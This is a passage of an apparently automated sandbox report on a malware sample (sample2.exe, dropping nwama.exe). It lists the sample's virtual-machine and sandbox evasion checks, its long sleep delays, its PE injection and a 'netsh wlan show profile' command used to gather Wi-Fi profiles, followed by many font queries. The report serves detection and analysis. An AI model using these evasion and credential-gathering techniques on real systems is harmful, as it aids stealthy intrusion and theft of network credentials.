                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM_3Show sources
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 7104, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 5848, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: sample2.exe, 00000000.00000002.659352287.0000000002CA1000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720364250.0000000002E91000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: sample2.exe, 00000000.00000002.659352287.0000000002CA1000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720364250.0000000002E91000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\sample2.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\sample2.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\sample2.exe TID: 7132Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\sample2.exe TID: 6492Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\sample2.exe TID: 6760Thread sleep count: 121 > 30
                  Source: C:\Users\user\Desktop\sample2.exe TID: 6760Thread sleep time: -60500s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6344Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6796Thread sleep count: 97 > 30
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 6796Thread sleep time: -48500s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 960Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 1320Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe TID: 4088Thread sleep time: -49000s >= -30000s
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\sample2.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeLast function: Thread delayed
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II,SOFTWARE\Microsoft\Windows Defender\Features
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: nwama.exe, 0000000B.00000002.989383094.0000000001282000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW2
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: nwama.exe, 0000000F.00000002.736059252.00000000030B1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: nwama.exe, 0000000B.00000002.989659236.00000000012FD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.998682152.0000000005650000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.997538946.0000000005090000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\sample2.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06540717 KiUserExceptionDispatcher,LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\sample2.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\sample2.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\sample2.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\sample2.exeMemory written: C:\Users\user\Desktop\sample2.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeMemory written: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeMemory written: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\sample2.exeProcess created: C:\Users\user\Desktop\sample2.exe {path}
                  Source: C:\Users\user\Desktop\sample2.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: sample2.exe, 00000001.00000002.989680308.0000000001DA0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.989872146.00000000017E0000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.989355954.0000000001260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
